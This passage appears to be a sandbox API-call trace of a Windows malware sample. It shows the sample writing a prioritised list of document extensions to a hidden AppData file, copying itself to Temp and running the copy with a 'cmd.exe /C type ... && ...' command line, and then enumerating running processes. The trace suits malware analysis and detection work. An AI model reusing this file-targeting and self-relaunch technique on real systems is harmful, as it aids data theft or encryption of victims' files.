cchLength=0x4 | out: lpsz="LOG1") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="LOG1", cchLength=0x4 | out: lpsz="LOG1") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="LOG2", cchLength=0x4 | out: lpsz="LOG2") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="LOG2", cchLength=0x4 | out: lpsz="LOG2") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="search-ms", cchLength=0x9 | out: lpsz="SEARCH-MS") returned 0x9 [0111.592] CharUpperBuffW (in: lpsz="search-ms", cchLength=0x9 | out: lpsz="SEARCH-MS") returned 0x9 [0111.592] CharUpperBuffW (in: lpsz="search-ms", cchLength=0x9 | out: lpsz="SEARCH-MS") returned 0x9 [0111.592] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.592] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: 
lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.594] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0111.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", cchWideChar=481, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 481 [0111.595] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", cchWideChar=481, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 481 [0111.595] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", cchWideChar=481, lpMultiByteStr=0x1278e88, cbMultiByte=481, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", lpUsedDefaultChar=0x0) returned 481 [0111.595] WriteFile (in: hFile=0xec, lpBuffer=0x1278e88*, nNumberOfBytesToWrite=0x1e1, lpNumberOfBytesWritten=0x12fbb0, lpOverlapped=0x0 | out: lpBuffer=0x1278e88*, lpNumberOfBytesWritten=0x12fbb0*=0x1e1, lpOverlapped=0x0) returned 1 [0111.655] CloseHandle (hObject=0xec) returned 1 [0111.655] GetTickCount () returned 0x26bbd [0111.655] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16844461428) returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: 
lpWideCharStr="N") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0111.656] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273b8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0111.656] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0111.656] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0111.656] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1273b8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0111.656] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0111.656] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0111.656] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\GYM4NXCU.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\GYM4NXCU.EXE\" [PARAMS]") returned 0xb1 [0111.656] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0111.657] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb1c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb0c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessInformation=0x12fb0c*(hProcess=0xf0, hThread=0xec, dwProcessId=0xd44, dwThreadId=0xd48)) returned 1 [0111.662] CloseHandle (hObject=0xf0) returned 1 [0111.662] CloseHandle (hObject=0xec) 
returned 1 [0111.662] Sleep (dwMilliseconds=0xfa) [0111.994] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf8 [0111.999] Process32FirstW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.000] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.000] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.001] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.003] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.004] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.004] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.005] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.006] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.006] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.007] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.008] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.008] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.009] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.009] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.011] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.012] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.013] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.014] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.015] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.016] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.018] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.019] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.020] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.021] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.022] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.023] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.024] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.025] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.026] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.028] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.029] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.030] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.031] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.032] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.096] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.097] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.098] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, 